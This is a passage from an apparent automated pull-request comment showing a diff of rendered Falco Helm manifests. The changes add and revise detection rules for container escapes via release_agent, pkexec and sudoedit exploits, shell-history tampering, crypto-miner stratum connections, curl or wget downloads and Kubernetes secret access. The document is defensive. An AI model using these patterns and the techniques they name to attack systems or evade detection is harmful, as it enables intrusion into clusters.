-        ((((evt.type in (accept,listen,connect) and evt.dir=<)) or
+        ((((evt.type in (accept,listen,connect) and evt.dir=<)) and
          (fd.typechar = 4 or fd.typechar = 6)) and
          (fd.ip != "0.0.0.0" and fd.net != "127.0.0.0/8") and
          (evt.rawres >= 0 or evt.res = EINPROGRESS))
@@ -817,6 +1261,9 @@
     - list: shell_config_directories
       items: [/etc/zsh]
 
+    - macro: user_known_shell_config_modifiers
+      condition: (never_true)
+
     - rule: Modify Shell Configuration File
       desc: Detect attempt to modify shell configuration files
       condition: >
@@ -826,6 +1273,7 @@
          fd.directory in (shell_config_directories))
         and not proc.name in (shell_binaries)
         and not exe_running_docker_save
+        and not user_known_shell_config_modifiers
       output: >
         a shell configuration file has been modified (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline pcmdline=%proc.pcmdline file=%fd.name container_id=%container.id image=%container.image.repository)
       priority:
@@ -938,7 +1386,7 @@
 
     # Qualys seems to run a variety of shell subprocesses, at various
     # levels. This checks at a few levels without the cost of a full
-    # proc.aname, which traverses the full parent heirarchy.
+    # proc.aname, which traverses the full parent hierarchy.
     - macro: run_by_qualys
       condition: >
         (proc.pname=qualys-cloud-ag or
@@ -1149,6 +1597,9 @@
     - macro: centrify_writing_krb
       condition: (proc.name in (adjoin,addns) and fd.name startswith /etc/krb5)
 
+    - macro: sssd_writing_krb
+      condition: (proc.name=adcli and proc.aname[2]=sssd and fd.name startswith /etc/krb5)
+
     - macro: cockpit_writing_conf
       condition: >
         ((proc.pname=cockpit-kube-la or proc.aname[2]=cockpit-kube-la)
@@ -1477,7 +1928,7 @@
       condition: (proc.name=oc and fd.name startswith /etc/origin/node)
 
     - macro: keepalived_writing_conf
-      condition: (proc.name=keepalived and fd.name=/etc/keepalived/keepalived.conf)
+      condition: (proc.name in (keepalived, kube-keepalived) and fd.name=/etc/keepalived/keepalived.conf)
 
     - macro: etcd_manager_updating_dns
       condition: (container and proc.name=etcd-manager and fd.name=/etc/hosts)
@@ -1592,6 +2043,7 @@
         and not nginx_writing_certs
         and not chef_client_writing_conf
         and not centrify_writing_krb
+        and not sssd_writing_krb
         and not cockpit_writing_conf
         and not ipsec_writing_conf
         and not httpd_writing_ssl_conf
@@ -2181,7 +2633,7 @@
               registry.access.redhat.com/sematext/agent,
               registry.access.redhat.com/sematext/logagent]
 
-    # These container images are allowed to run with --privileged
+    # These container images are allowed to run with --privileged and full set of capabilities
     - list: falco_privileged_images
       items: [
         docker.io/calico/node,
@@ -2199,10 +2651,12 @@
         gke.gcr.io/kube-proxy,
         gke.gcr.io/gke-metadata-server,
         gke.gcr.io/netd-amd64,
+        gke.gcr.io/watcher-daemonset,
         gcr.io/google-containers/prometheus-to-sd,
         k8s.gcr.io/ip-masq-agent-amd64,
         k8s.gcr.io/kube-proxy,
         k8s.gcr.io/prometheus-to-sd,
+        public.ecr.aws/falcosecurity/falco,
         quay.io/calico/node,
         sysdig/sysdig,
         sematext_images
@@ -2231,7 +2685,7 @@
     - list: falco_sensitive_mount_images
       items: [
         docker.io/sysdig/sysdig, sysdig/sysdig,
-        docker.io/falcosecurity/falco, falcosecurity/falco,
+        docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco,
         gcr.io/google_containers/hyperkube,
         gcr.io/google_containers/kube-proxy, docker.io/calico/node,
         docker.io/rook/toolbox, docker.io/cloudnativelabs/kube-router, docker.io/consul,
@@ -2247,19 +2701,6 @@
                   container.image.repository in (falco_sensitive_mount_images) or
                   container.image.repository startswith quay.io/sysdig/)
 
-    # These container images are allowed to run with hostnetwork=true
-    - list: falco_hostnetwork_images
-      items: [
-        gcr.io/google-containers/prometheus-to-sd,
-        gcr.io/projectcalico-org/typha,
-        gcr.io/projectcalico-org/node,
-        gke.gcr.io/gke-metadata-server,
-        gke.gcr.io/kube-proxy,
-        gke.gcr.io/netd-amd64,
-        k8s.gcr.io/ip-masq-agent-amd64
-        k8s.gcr.io/prometheus-to-sd,
-        ]
-
     # Add conditions to this macro (probably in a separate file,
     # overwriting this macro) to specify additional containers that are
     # allowed to perform sensitive mounts.
@@ -2280,14 +2721,40 @@
       priority: INFO
       tags: [container, cis, mitre_privilege_escalation, mitre_lateral_movement]
 
+    # These capabilities were used in the past to escape from containers
+    - macro: excessively_capable_container
+      condition: >
+        (thread.cap_permitted contains CAP_SYS_ADMIN
+        or thread.cap_permitted contains CAP_SYS_MODULE
+        or thread.cap_permitted contains CAP_SYS_RAWIO
+        or thread.cap_permitted contains CAP_SYS_PTRACE
+        or thread.cap_permitted contains CAP_SYS_BOOT
+        or thread.cap_permitted contains CAP_SYSLOG
+        or thread.cap_permitted contains CAP_DAC_READ_SEARCH
+        or thread.cap_permitted contains CAP_NET_ADMIN
+        or thread.cap_permitted contains CAP_BPF)
+
+    - rule: Launch Excessively Capable Container
+      desc: Detect container started with a powerful set of capabilities. Exceptions are made for known trusted images.
+      condition: >
+        container_started and container
+        and excessively_capable_container
+        and not falco_privileged_containers
+        and not user_privileged_containers
+      output: Excessively capable container started (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline %container.info image=%container.image.repository:%container.image.tag cap_permitted=%thread.cap_permitted)
+      priority: INFO
+      tags: [container, cis, mitre_privilege_escalation, mitre_lateral_movement]
+
+
     # For now, only considering a full mount of /etc as
     # sensitive. Ideally, this would also consider all subdirectories
-    # below /etc as well, but the globbing mechanism used by sysdig
+    # below /etc as well, but the globbing mechanism
     # doesn't allow exclusions of a full pattern, only single characters.
     - macro: sensitive_mount
       condition: (container.mount.dest[/proc*] != "N/A" or
                   container.mount.dest[/var/run/docker.sock] != "N/A" or
                   container.mount.dest[/var/run/crio/crio.sock] != "N/A" or
+                  container.mount.dest[/run/containerd/containerd.sock] != "N/A" or
                   container.mount.dest[/var/lib/kubelet] != "N/A" or
                   container.mount.dest[/var/lib/kubelet/pki] != "N/A" or
                   container.mount.dest[/] != "N/A" or
@@ -2415,7 +2882,8 @@
         '"sh -c  -t -i"',
         '"sh -c openssl version"',
         '"bash -c id -Gn kafadmin"',
-        '"sh -c /bin/sh -c ''date +%%s''"'
+        '"sh -c /bin/sh -c ''date +%%s''"',
+        '"sh -c /usr/share/lighttpd/create-mime.conf.pl"'
         ]
 
     # This list allows for easy additions to the set of commands allowed
@@ -2574,7 +3042,7 @@
     #   output: "sshd sent error message to syslog (error=%evt.buffer)"
     #   priority: WARNING
 
-    - macro: somebody_becoming_themself
+    - macro: somebody_becoming_themselves
       condition: ((user.name=nobody and evt.arg.uid=nobody) or
                   (user.name=www-data and evt.arg.uid=www-data) or
                   (user.name=_apt and evt.arg.uid=_apt) or
@@ -2612,7 +3080,7 @@
         evt.type=setuid and evt.dir=>
         and (known_user_in_container or not container)
         and not (user.name=root or user.uid=0)
-        and not somebody_becoming_themself
+        and not somebody_becoming_themselves
         and not proc.name in (known_setuid_binaries, userexec_binaries, mail_binaries, docker_binaries,
                               nomachine_binaries)
         and not proc.name startswith "runc:"
@@ -2636,7 +3104,7 @@
         activity by any programs that can manage users, passwords, or permissions. sudo and su are excluded.
         Activity in containers is also excluded--some containers create custom users on top
         of a base linux distribution at startup.
-        Some innocuous commandlines that don't actually change anything are excluded.
+        Some innocuous command lines that don't actually change anything are excluded.
       condition: >
         spawned_process and proc.name in (user_mgmt_binaries) and
         not proc.name in (su, sudo, lastlog, nologin, unix_chkpwd) and not container and
@@ -2672,7 +3140,7 @@
       desc: creating any files below /dev other than known programs that manage devices. Some rootkits hide files in /dev.
       condition: >
         fd.directory = /dev and
-        (evt.type = creat or ((evt.type = open or evt.type = openat) and evt.arg.flags contains O_CREAT))
+        (evt.type = creat or (evt.type in (open,openat,openat2) and evt.arg.flags contains O_CREAT))
         and not proc.name in (dev_creation_binaries)
         and not fd.name in (allowed_dev_files)
         and not fd.name startswith /dev/tty
@@ -2686,7 +3154,7 @@
     # explicitly enumerate the container images that you want to allow
     # access to EC2 metadata. In this main falco rules file, there isn't
     # any way to know all the containers that should have access, so any
-    # container is alllowed, by repeating the "container" macro. In the
+    # container is allowed, by repeating the "container" macro. In the
     # overridden macro, the condition would look something like
     # (container.image.repository = vendor/container-1 or
     # container.image.repository = vendor/container-2 or ...)
@@ -2740,7 +3208,8 @@
          docker.io/sysdig/sysdig, docker.io/falcosecurity/falco,
          sysdig/sysdig, falcosecurity/falco,
          fluent/fluentd-kubernetes-daemonset, prom/prometheus,
-         ibm_cloud_containers)
+         ibm_cloud_containers,
+         public.ecr.aws/falcosecurity/falco)
          or (k8s.ns.name = "kube-system"))
 
     - macro: k8s_api_server
@@ -2944,27 +3413,29 @@
         WARNING
       tags: [process, mitre_persistence]
 
+    # here `ash_history` will match both `bash_history` and `ash_history`
     - macro: modify_shell_history
       condition: >
         (modify and (
-          evt.arg.name contains "bash_history" or
-          evt.arg.name contains "zsh_history" or
+          evt.arg.name endswith "ash_history" or
+          evt.arg.name endswith "zsh_history" or
           evt.arg.name contains "fish_read_history" or
           evt.arg.name endswith "fish_history" or
-          evt.arg.oldpath contains "bash_history" or
-          evt.arg.oldpath contains "zsh_history" or
+          evt.arg.oldpath endswith "ash_history" or
+          evt.arg.oldpath endswith "zsh_history" or
           evt.arg.oldpath contains "fish_read_history" or
           evt.arg.oldpath endswith "fish_history" or
-          evt.arg.path contains "bash_history" or
-          evt.arg.path contains "zsh_history" or
+          evt.arg.path endswith "ash_history" or
+          evt.arg.path endswith "zsh_history" or
           evt.arg.path contains "fish_read_history" or
           evt.arg.path endswith "fish_history"))
 
+    # here `ash_history` will match both `bash_history` and `ash_history`
     - macro: truncate_shell_history
       condition: >
         (open_write and (
-          fd.name contains "bash_history" or
-          fd.name contains "zsh_history" or
+          fd.name endswith "ash_history" or
+          fd.name endswith "zsh_history" or
           fd.name contains "fish_read_history" or
           fd.name endswith "fish_history") and evt.arg.flags contains "O_TRUNC")
 
@@ -3003,7 +3474,7 @@
       items: [hyperkube, kubelet, k3s-agent]
 
     # This macro should be overridden in user rules as needed. This is useful if a given application
-    # should not be ignored alltogether with the user_known_chmod_applications list, but only in
+    # should not be ignored altogether with the user_known_chmod_applications list, but only in
     # specific conditions.
     - macro: user_known_set_setuid_or_setgid_bit_conditions
       condition: (never_true)
@@ -3082,8 +3553,18 @@
         create_symlink and
         (evt.arg.target in (sensitive_file_names) or evt.arg.target in (sensitive_directory_names))
       output: >
-        Symlinks created over senstivie files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
-      priority: NOTICE
+        Symlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
+      priority: WARNING
+      tags: [file, mitre_exfiltration]
+
+    - rule: Create Hardlink Over Sensitive Files
+      desc: Detect hardlink created over sensitive files
+      condition: >
+        create_hardlink and
+        (evt.arg.oldpath in (sensitive_file_names))
+      output: >
+        Hardlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.oldpath linkpath=%evt.arg.newpath parent_process=%proc.pname)
+      priority: WARNING
       tags: [file, mitre_exfiltration]
 
     - list: miner_ports
@@ -3176,11 +3657,10 @@
       condition: (fd.sport in (miner_ports) and fd.sip.name in (miner_domains))
 
     - macro: net_miner_pool
-      condition: (evt.type in (sendto, sendmsg) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
+      condition: (evt.type in (sendto, sendmsg, connect) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
 
     - macro: trusted_images_query_miner_domain_dns
-      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco))
-      append: false
+      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco))
 
     # The rule is disabled by default.
     # Note: falco will send DNS request to resolve miner pool domain which may trigger alerts in your environment.
@@ -3188,13 +3668,13 @@
       desc: Miners typically connect to miner pools on common ports.
       condition: net_miner_pool and not trusted_images_query_miner_domain_dns
       enabled: false
-      output: Outbound connection to IP/Port flagged by cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
+      output: Outbound connection to IP/Port flagged by https://cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [network, mitre_execution]
 
     - rule: Detect crypto miners using the Stratum protocol
       desc: Miners typically specify the mining pool to connect to with a URI that begins with 'stratum+tcp'
-      condition: spawned_process and proc.cmdline contains "stratum+tcp"
+      condition: spawned_process and (proc.cmdline contains "stratum+tcp" or proc.cmdline contains "stratum2+tcp" or proc.cmdline contains "stratum+ssl" or proc.cmdline contains "stratum2+ssl")
       output: Possible miner running (command=%proc.cmdline container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [process, mitre_execution]
@@ -3330,7 +3810,7 @@
 
     # The two Container Drift rules below will fire when a new executable is created in a container.
     # There are two ways to create executables - file is created with execution permissions or permissions change of existing file.
-    # We will use a new sysdig filter, is_open_exec, to find all files creations with execution permission, and will trace all chmods in a container.
+    # We will use a new filter, is_open_exec, to find all files creations with execution permission, and will trace all chmods in a container.
     # The use case we are targeting here is an attempt to execute code that was not shipped as part of a container (drift) -
     # an activity that might be malicious or non-compliant.
     # Two things to pay attention to:
@@ -3363,7 +3843,7 @@
     - rule: Container Drift Detected (open+create)
       desc: New executable created in a container due to open+create
       condition: >
-        evt.type in (open,openat,creat) and
+        evt.type in (open,openat,openat2,creat) and
         evt.is_open_exec=true and
         container and
         not runc_writing_exec_fifo and
@@ -3413,7 +3893,7 @@
     # A privilege escalation to root through heap-based buffer overflow
     - rule: Sudo Potential Privilege Escalation
       desc: Privilege escalation vulnerability affecting sudo (<= 1.9.5p2). Executing sudo using sudoedit -s or sudoedit -i command with command-line argument that ends with a single backslash character from an unprivileged user it's possible to elevate the user privileges to root.
-      condition: spawned_process and user.uid != 0 and proc.name=sudoedit and (proc.args contains -s or proc.args contains -i) and (proc.args contains "\ " or proc.args endswith \)
+      condition: spawned_process and user.uid != 0 and (proc.name=sudoedit or proc.name = sudo) and (proc.args contains -s or proc.args contains -i or proc.args contains --login) and (proc.args contains "\ " or proc.args endswith \)
       output: "Detect Sudo Privilege Escalation Exploit (CVE-2021-3156) (user=%user.name parent=%proc.pname cmdline=%proc.cmdline %container.info)"
       priority: CRITICAL
       tags: [filesystem, mitre_privilege_escalation]
@@ -3431,13 +3911,17 @@
     - macro: mount_info
       condition: (proc.args="" or proc.args intersects ("-V", "-l", "-h"))
 
+    - macro: user_known_mount_in_privileged_containers
+      condition: (never_true)
+
     - rule: Mount Launched in Privileged Container
-      desc: Detect file system mount happened inside a privilegd container which might lead to container escape.
+      desc: Detect file system mount happened inside a privileged container which might lead to container escape.
       condition: >
         spawned_process and container
         and container.privileged=true
         and proc.name=mount
         and not mount_info
+        and not user_known_mount_in_privileged_containers
       output: Mount was executed inside a privileged container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline %container.info image=%container.image.repository:%container.image.tag)
       priority: WARNING
       tags: [container, cis, mitre_lateral_movement]
@@ -3460,12 +3944,64 @@
       priority: CRITICAL
       tags: [syscall, mitre_defense_evasion]
 
+    - list: ingress_remote_file_copy_binaries
+      items: [wget]
+
+    - macro: ingress_remote_file_copy_procs
+      condition: (proc.name in (ingress_remote_file_copy_binaries))
+
+    # Users should overwrite this macro to specify conditions under which a
+    # Custom condition for use of ingress remote file copy tool in container
+    - macro: user_known_ingress_remote_file_copy_activities
+      condition: (never_true)
+
+    -  macro: curl_download
+       condition: proc.name = curl and
+                  (proc.cmdline contains " -o " or
+                  proc.cmdline contains " --output " or
+                  proc.cmdline contains " -O " or
+                  proc.cmdline contains " --remote-name ")
+
+    - rule: Launch Ingress Remote File Copy Tools in Container
+      desc: Detect ingress remote file copy tools launched in container
+      condition: >
+        spawned_process and
+        container and
+        (ingress_remote_file_copy_procs or curl_download) and
+        not user_known_ingress_remote_file_copy_activities
+      output: >
+        Ingress remote file copy tool launched in container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline parent_process=%proc.pname
+        container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
+      priority: NOTICE
+      tags: [network, process, mitre_command_and_control]
+
+    # This rule helps detect CVE-2021-4034:
+    # A privilege escalation to root through memory corruption
+    - rule: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034)
+      desc: "This rule detects an attempt to exploit a privilege escalation vulnerability in Polkit's pkexec. By running specially crafted code, a local user can leverage this flaw to gain root privileges on a compromised system"
+      condition:
+        spawned_process and user.uid != 0 and proc.name=pkexec and proc.args = ''
+      output:
+        "Detect Polkit pkexec Local Privilege Escalation Exploit (CVE-2021-4034) (user=%user.loginname uid=%user.loginuid command=%proc.cmdline args=%proc.args)"
+      priority: CRITICAL
+      tags: [process, mitre_privilege_escalation]
+
+
+    - rule: Detect release_agent File Container Escapes
+      desc: "This rule detect an attempt to exploit a container escape using release_agent file. By running a container with certains capabilities, a privileged user can modify release_agent file and escape from the container"
+      condition:
+        open_write and container and fd.name endswith release_agent and (user.uid=0 or thread.cap_effective contains CAP_DAC_OVERRIDE) and thread.cap_effective contains CAP_SYS_ADMIN
+      output:
+        "Detect an attempt to exploit a container escape using release_agent file (user=%user.name user_loginuid=%user.loginuid filename=%fd.name %container.info image=%container.image.repository:%container.image.tag cap_effective=%thread.cap_effective)"
+      priority: CRITICAL
+      tags: [container, mitre_privilege_escalation, mitre_lateral_movement]
+
     # Application rules have moved to application_rules.yaml. Please look
     # there if you want to enable them by adding to
     # falco_rules.local.yaml.
   k8s_audit_rules.yaml: |
     #
-    # Copyright (C) 2019 The Falco Authors.
+    # Copyright (C) 2022 The Falco Authors.
     #
     #
     # Licensed under the Apache License, Version 2.0 (the "License");
@@ -3480,7 +4016,14 @@
     # See the License for the specific language governing permissions and
     # limitations under the License.
     #
-    - required_engine_version: 2
+
+    - required_engine_version: 12
+
+    - required_plugin_versions:
+      - name: k8saudit
+        version: 0.1.0
+      - name: json
+        version: 0.3.0
 
     # Like always_true/always_false, but works with k8s audit events
     - macro: k8s_audit_always_true
@@ -3517,13 +4060,24 @@
         cluster-autoscaler,
         "system:addon-manager",
         "cloud-controller-manager",
-        "eks:node-manager",
         "system:kube-controller-manager"
         ]
 
+    - list: eks_allowed_k8s_users
+      items: [
+        "eks:node-manager",
+        "eks:certificate-controller",
+        "eks:fargate-scheduler",
+        "eks:k8s-metrics",
+        "eks:authenticator",
+        "eks:cluster-event-watcher",
+        "eks:nodewatcher",
+        "eks:pod-identity-mutating-webhook"
+        ]
+    -
     - rule: Disallowed K8s User
       desc: Detect any k8s operation by users outside of an allowed set of users.
-      condition: kevt and non_system_user and not ka.user.name in (allowed_k8s_users)
+      condition: kevt and non_system_user and not ka.user.name in (allowed_k8s_users) and not ka.user.name in (eks_allowed_k8s_users)
       output: K8s Operation performed by user not in allowed list of users (user=%ka.user.name target=%ka.target.name/%ka.target.resource verb=%ka.verb uri=%ka.uri resp=%ka.response.code)
       priority: WARNING
       source: k8s_audit
@@ -3541,6 +4095,9 @@
     - macro: response_successful
       condition: (ka.response.code startswith 2)
 
+    - macro: kget
+      condition: ka.verb=get
+
     - macro: kcreate
       condition: ka.verb=create
 
@@ -3586,6 +4143,12 @@
     - macro: health_endpoint
       condition: ka.uri=/healthz
 
+    - macro: live_endpoint
+      condition: ka.uri=/livez
+
+    - macro: ready_endpoint
+      condition: ka.uri=/readyz
+
     - rule: Create Disallowed Pod
       desc: >
         Detect an attempt to start a pod with a container image outside of a list of allowed images.
@@ -3618,6 +4181,19 @@
       source: k8s_audit
       tags: [k8s]
 
+    # These container images are allowed to run with hostnetwork=true
+    - list: falco_hostnetwork_images
+      items: [
+        gcr.io/google-containers/prometheus-to-sd,
+        gcr.io/projectcalico-org/typha,
+        gcr.io/projectcalico-org/node,
+        gke.gcr.io/gke-metadata-server,
+        gke.gcr.io/kube-proxy,
+        gke.gcr.io/netd-amd64,
+        k8s.gcr.io/ip-masq-agent-amd64
+        k8s.gcr.io/prometheus-to-sd,
+        ]
+
     # Corresponds to K8s CIS Benchmark 1.7.4
     - rule: Create HostNetwork Pod
       desc: Detect an attempt to start a pod using the host network.
@@ -3627,6 +4203,28 @@
       source: k8s_audit
       tags: [k8s]
 
+    - list: falco_hostpid_images
+      items: []
+
+    - rule: Create HostPid Pod
+      desc: Detect an attempt to start a pod using the host pid namespace.
+      condition: kevt and pod and kcreate and ka.req.pod.host_pid intersects (true) and not ka.req.pod.containers.image.repository in (falco_hostpid_images)
+      output: Pod started using host pid namespace (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
+    - list: falco_hostipc_images
+      items: []
+
+    - rule: Create HostIPC Pod
+      desc: Detect an attempt to start a pod using the host ipc namespace.
+      condition: kevt and pod and kcreate and ka.req.pod.host_ipc intersects (true) and not ka.req.pod.containers.image.repository in (falco_hostipc_images)
+      output: Pod started using host ipc namespace (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
     - macro: user_known_node_port_service
       condition: (k8s_audit_never_true)
 
@@ -3661,7 +4259,7 @@
     - rule: Anonymous Request Allowed
       desc: >
         Detect any request made by the anonymous user that was allowed
-      condition: kevt and ka.user.name=system:anonymous and ka.auth.decision="allow" and not health_endpoint
+      condition: kevt and ka.user.name=system:anonymous and ka.auth.decision="allow" and not health_endpoint and not live_endpoint and not ready_endpoint
       output: Request by anonymous user allowed (user=%ka.user.name verb=%ka.verb uri=%ka.uri reason=%ka.auth.reason))
       priority: WARNING
       source: k8s_audit
@@ -3741,6 +4339,7 @@
         k8s.gcr.io/kube-apiserver,
         gke.gcr.io/kube-proxy,
         gke.gcr.io/netd-amd64,
+        gke.gcr.io/watcher-daemonset,
         k8s.gcr.io/addon-resizer
         k8s.gcr.io/prometheus-to-sd,
         k8s.gcr.io/k8s-dns-dnsmasq-nanny-amd64,
@@ -3768,9 +4367,31 @@
       items: []
 
     - list: known_sa_list
-      items: ["pod-garbage-collector","resourcequota-controller","cronjob-controller","generic-garbage-collector",
-              "daemon-set-controller","endpointslice-controller","deployment-controller", "replicaset-controller",
-              "endpoint-controller", "namespace-controller", "statefulset-controller", "disruption-controller"]
+      items: [
+        coredns,
+        coredns-autoscaler,
+        cronjob-controller,
+        daemon-set-controller,
+        deployment-controller,
+        disruption-controller,
+        endpoint-controller,
+        endpointslice-controller,
+        endpointslicemirroring-controller,
+        generic-garbage-collector,
+        horizontal-pod-autoscaler,
+        job-controller,
+        namespace-controller,
+        node-controller,
+        persistent-volume-binder,
+        pod-garbage-collector,
+        pv-protection-controller,
+        pvc-protection-controller,
+        replicaset-controller,
+        resourcequota-controller,
+        root-ca-cert-publisher,
+        service-account-controller,
+        statefulset-controller
+        ]
 
     - macro: trusted_sa
       condition: (ka.target.name in (known_sa_list, user_known_sa_list))
@@ -3797,7 +4418,7 @@
       tags: [k8s]
 
     # Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
-    # (exapand this to any built-in cluster role that does "sensitive" things)
+    # (expand this to any built-in cluster role that does "sensitive" things)
     - rule: Attach to cluster-admin Role
       desc: Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
       condition: kevt and clusterrolebinding and kcreate and ka.req.binding.role=cluster-admin
@@ -3910,7 +4531,7 @@
     - rule: K8s Serviceaccount Created
       desc: Detect any attempt to create a service account
       condition: (kactivity and kcreate and serviceaccount and response_successful)
-      output: K8s Serviceaccount Created (user=%ka.user.name user=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      output: K8s Serviceaccount Created (user=%ka.user.name serviceaccount=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
@@ -3918,7 +4539,7 @@
     - rule: K8s Serviceaccount Deleted
       desc: Detect any attempt to delete a service account
       condition: (kactivity and kdelete and serviceaccount and response_successful)
-      output: K8s Serviceaccount Deleted (user=%ka.user.name user=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      output: K8s Serviceaccount Deleted (user=%ka.user.name serviceaccount=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
@@ -3964,13 +4585,37 @@
       tags: [k8s]
 
     - rule: K8s Secret Deleted
-      desc: Detect any attempt to delete a secret Service account tokens are excluded.
+      desc: Detect any attempt to delete a secret. Service account tokens are excluded.
       condition: (kactivity and kdelete and secret and ka.target.namespace!=kube-system and non_system_user and response_successful)
       output: K8s Secret Deleted (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
 
+    - rule: K8s Secret Get Successfully
+      desc: >
+        Detect any attempt to get a secret. Service account tokens are excluded.
+      condition: >
+        secret and kget
+        and kactivity
+        and response_successful
+      output: K8s Secret Get Successfully (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      priority: ERROR
+      source: k8s_audit
+      tags: [k8s]
+
+    - rule:  K8s Secret Get Unsuccessfully Tried
+      desc: >
+        Detect an unsuccessful attempt to get the secret. Service account tokens are excluded.
+      condition: >
+        secret and kget
+        and kactivity
+        and not response_successful
+      output: K8s Secret Get Unsuccessfully Tried (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
     # This rule generally matches all events, and as a result is disabled
     # by default. If you wish to enable these events, modify the
     # following macro.
@@ -4003,7 +4648,7 @@
     # cluster creation. This may signify a permission setting too broader.
     # As we can't check for role of the user on a general ka.* event, this
     # may or may not be an administrator. Customize the full_admin_k8s_users
-    # list to your needs, and activate at your discrection.
+    # list to your needs, and activate at your discretion.
 
     # # How to test:
     # # Execute any kubectl command connected using default cluster user, as:
@@ -4184,8 +4829,8 @@
         app: falco
         role: security
       annotations:
-        checksum/config: 9ac2b16de3ea0caa56e07879f0d383db5a400f1e84c2e04d5f2cec53f8b23a4a
-        checksum/rules: 4fead7ed0d40bd6533c61315bc4089d124976d46b052192f768b9c97be5d405e
+        checksum/config: 4b97125a888a5b4a68854280134e118109f4db0a8209813eb2edd9b82fbe7b0e
+        checksum/rules: 321342874a2d2084ca1255e7c0d5a51be6ab8f857123cdd1158916436a165074
         checksum/certs: 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
     spec:
       serviceAccountName: falco
@@ -4196,7 +4841,7 @@
           operator: Exists
       containers:
         - name: falco
-          image: public.ecr.aws/falcosecurity/falco:0.30.0
+          image: public.ecr.aws/falcosecurity/falco:0.32.0
           imagePullPolicy: IfNotPresent
           resources:
             limits:
@@ -4211,11 +4856,14 @@
             - /usr/bin/falco
             - --cri
             - /run/containerd/containerd.sock
+            - --cri
+            - /run/crio/crio.sock
             - -K
             - /var/run/secrets/kubernetes.io/serviceaccount/token
             - -k
             - https://$(KUBERNETES_SERVICE_HOST)
-            - --k8s-node="${FALCO_K8S_NODE_NAME}"
+            - --k8s-node
+            - "$(FALCO_K8S_NODE_NAME)"
             - -pk
           env:
             - name: FALCO_K8S_NODE_NAME
@@ -4243,6 +4891,8 @@
           volumeMounts:
             - mountPath: /host/run/containerd/containerd.sock
               name: containerd-socket
+            - mountPath: /host/run/crio/crio.sock
+              name: crio-socket
             - mountPath: /host/dev
               name: dev-fs
               readOnly: true
@@ -4270,6 +4920,9 @@
         - name: containerd-socket
           hostPath:
             path: /var/run/k3s/containerd/containerd.sock
+        - name: crio-socket
+          hostPath:
+            path: /run/crio/crio.sock
         - name: dev-fs
           hostPath:
             path: /dev
@@ -4300,6 +4953,10 @@
                 path: falco_rules.local.yaml
               - key: application_rules.yaml
                 path: rules.available/application_rules.yaml
+              - key: k8s_audit_rules.yaml
+                path: k8s_audit_rules.yaml
+              - key: aws_cloudtrail_rules.yaml
+                path: aws_cloudtrail_rules.yaml
         - name: rules-volume
           configMap:
             name: falco-rules

@renovate renovate bot changed the title chore(deps): update helm release falco to v1.19.2 chore(deps): update helm release falco to v1.19.3 Jun 14, 2022
@github-actions
Copy link
Contributor

Path: cluster/apps/security/falco-system/falco/helm-release.yaml
Version: 1.16.0 -> 1.19.3

@@ -153,7 +153,7 @@
     release: "falco"
     heritage: "Helm"
 data:
